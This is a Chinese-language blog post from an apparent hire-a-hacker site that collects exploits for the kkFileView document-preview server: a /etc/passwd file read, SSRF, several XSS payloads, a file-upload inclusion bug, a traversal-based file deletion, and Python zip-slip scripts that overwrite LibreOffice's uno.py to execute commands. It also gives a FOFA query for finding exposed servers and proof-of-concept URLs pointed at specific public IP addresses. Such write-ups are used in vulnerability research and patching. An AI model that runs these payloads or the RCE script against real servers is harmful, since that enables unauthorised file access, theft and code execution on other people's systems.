Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86385602

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

kkFileView漏洞总结

0x00 kkFileview存在任意文件读取漏洞

漏洞描述 Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。 漏洞影响 kkFileview <=3.6.0 fofa查询 body="kkFileView" 漏洞证明 r12j2c5w4yr13843.png    http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd yq0vc5iqowd13846.png

0x01 kkFileView SSR 漏洞

洞描述 kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。 漏洞影响 kkFileview =v4.1.0 洞证明 cseuzspieeb13847.png d4j5j5pkab313851.png http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn r45k2512yci13853.png e2pnl2pymw213854.png        

0x03 kkFileView XSS漏洞

漏洞描述 kkFileview v4.1.0存两处XSS漏洞,可能导致网站cookies泄露。 漏洞影响 kkFileview =v4.1.0 漏洞证明 http://www.baidu.com/test.txt"><img src=111 onerror=alert(1)> 编码base64: aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg== url编码: aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D poc1: /onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E /picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D       http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E vxkadhfxnx413857.png   http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D fhzfy4vkm0j13858.png   <svg/onload=alert(1)>编码base64: PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+ url编码: PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B poc2: /picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B http://119.91.146.127:8012/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B 2sc5hu2hfcz13863.png

0x04 kkFileView任意文件上传导致xss和文件包含漏洞

漏洞描述 kkFileview全版本存在文件解析漏洞,攻击者可以利用此漏洞造成存储型 XSS、文件包含或者SSRF,远程攻击者可以通过将任意JavaSript脚本上传到服务器来持久性的利用应用程序发出攻击请求 漏洞影响 kkFileView=4.1.0 漏洞证明

1、上传文件

 

eh3gubz33p013865.png  

 

 

1g4osmdvwds13867.png  

 

2、访问漏洞位置
http://139.9.101.60:8012/demo/2.html

 

me0mdnepcgr13868.png   rmzje3fvj5f13871.png  

2.文件包含:

https://file.keking.cn/demo/test1.js
image
访问:
https://file.keking.cn/demo/test14.html
image

 

0x05 kkFileView任意文件删除漏洞

漏洞描述

kkFileview v4.0.0存在任意文件删除漏洞,可能导致系统任意文件被删除

漏洞影响

kkFileview= v4.0.0

漏洞证明

/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件) 31el1s2l2qw13878.png ceiqsllq5a413881.png

0x06 kFileView-v4.3.0~v4.40-beta 存在RCE漏洞

漏洞影响:v4.2.1 和 v4.2.0 都是影响,4.1.0不受影响

任意文件上传
import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'1ueeeeee'
        binary2 = b'hacked_by_1ue'
        zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("hack.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../tmp/flag", binary2)
        zipFile.close()
    except IOError as e:
        raise e

制作恶意hack.zip,注意里面必须有一个正常文件,例如test,便于创建hack.zip_缓存文件

img

上传文件并预览

img

img

发现成功穿越

RCE

可以任意文件上传,并且可以追加文件内容

经过我研究发现,目标在使用odt转pdf时会调用系统的Libreoffice,而此进程会调用库中的uno.py文件,因此可以覆盖该py文件的内容

import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'1ue'
        binary2 = b'import os\r\nos.system(\'touch /tmp/hack_by_1ue\')'
        zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("hack.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)
        zipFile.close()
    except IOError as e:
        raise e

制作恶意的zip包 上传并预览

img

再随便上传一个odt文件,另其发起libreoffice任务 上传并预览

img

可以看到命令成功被执行

img

uno.py中也确实被写入了内容